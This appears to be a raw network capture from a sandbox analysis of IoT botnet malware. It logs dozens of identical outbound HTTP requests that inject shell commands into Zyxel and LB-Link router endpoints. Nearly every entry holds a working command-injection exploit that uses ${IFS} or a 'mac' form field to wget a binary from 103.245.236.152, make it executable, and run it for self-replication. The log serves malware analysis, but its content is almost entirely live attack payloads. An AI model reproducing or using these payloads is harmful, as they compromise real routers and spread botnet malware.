                                      Jan 14, 2024 15:50:53.468738079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6222192.168.2.1437034198.225.249.103443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.468770981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6223192.168.2.146090651.242.134.210443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.468813896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6224192.168.2.144560857.40.187.253443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.468919039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6225192.168.2.143325253.220.31.148443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.468946934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6226192.168.2.143882242.61.171.198443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.469002008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6227192.168.2.1444886129.64.207.197443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.469027042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6228192.168.2.1446830220.97.1.11443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.469055891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6229192.168.2.143444698.3.56.189443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.469110012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6230192.168.2.145515427.103.122.18443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.469155073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6231192.168.2.1446740110.11.88.218443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.469177008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6232192.168.2.1444600162.133.210.210443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.469235897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6233192.168.2.145627087.4.11.133443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.469266891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6234192.168.2.1451978175.238.203.87443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.469300985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6235192.168.2.1434662213.87.71.7443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.469352961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6236192.168.2.1456422222.85.50.126443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.469372034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6237192.168.2.1456726209.118.37.132443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.469440937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6238192.168.2.146097096.9.216.236443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.469486952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6239192.168.2.1449810154.242.137.241443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.469518900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6240192.168.2.1458696144.8.95.156443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.469572067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6241192.168.2.1454200155.179.24.208443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.469621897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6242192.168.2.145593074.18.196.157443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.469675064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6243192.168.2.145616668.93.20.0443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.469732046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6244192.168.2.1433552158.179.94.165443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.469752073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6245192.168.2.145029458.228.192.227443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.469819069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6246192.168.2.1435820176.194.232.252443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.469840050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6247192.168.2.1456888107.118.116.173443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.469873905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6248192.168.2.143442098.145.103.173443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.469949007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6249192.168.2.1441444121.238.66.36443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.469985962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6250192.168.2.145474652.162.127.26443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.470031023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6251192.168.2.144843214.163.51.96443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.470084906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6252192.168.2.1441790207.237.169.137443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.470113993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6253192.168.2.1450734118.100.92.218443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.470154047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6254192.168.2.144145466.91.142.92443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.470206976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6255192.168.2.1446124198.96.12.111443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.470240116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6256192.168.2.14426445.66.181.180443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.470263958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6257192.168.2.1460222159.246.244.184443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.470285892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6258192.168.2.1450902108.16.74.120443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.470338106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6259192.168.2.143292472.126.18.70443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.470376968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6260192.168.2.1445684175.158.18.184443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.470411062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6261192.168.2.1446398175.17.187.93443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.470444918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6262192.168.2.1458848221.243.107.38443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.470479965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6263192.168.2.1442508124.180.18.3443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.470519066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6264192.168.2.144452847.150.173.119443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.470556974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6265192.168.2.1437008165.5.12.84443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.474057913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6266192.168.2.143871663.247.154.2068080
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:53.683763027 CET228OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                      Cookie: user=admin
                                      Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 35 32 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                      Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.152/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6267192.168.2.1437852105.80.147.73443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.481733084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6268192.168.2.1456416121.102.249.221443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.481841087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6269192.168.2.144036044.138.1.65443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.481867075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6270192.168.2.1438172103.73.169.84443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.481908083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6271192.168.2.1436612124.93.158.162443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.481940031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6272192.168.2.1433516113.160.2.247443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.481995106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6273192.168.2.144581658.161.79.2443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.482044935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6274192.168.2.1448324219.165.28.88443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.482070923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6275192.168.2.1433118122.200.14.163443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.482096910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6276192.168.2.144136666.157.176.88443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.482186079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6277192.168.2.1442138126.23.106.190443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.482187033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6278192.168.2.144081070.46.80.180443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.482243061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6279192.168.2.1436564165.89.245.187443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.482286930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6280192.168.2.143361059.96.106.97443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.482323885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6281192.168.2.145826438.193.61.175443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.482361078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6282192.168.2.145920023.205.146.120443
                                      TimestampBytes transferredDirectionData
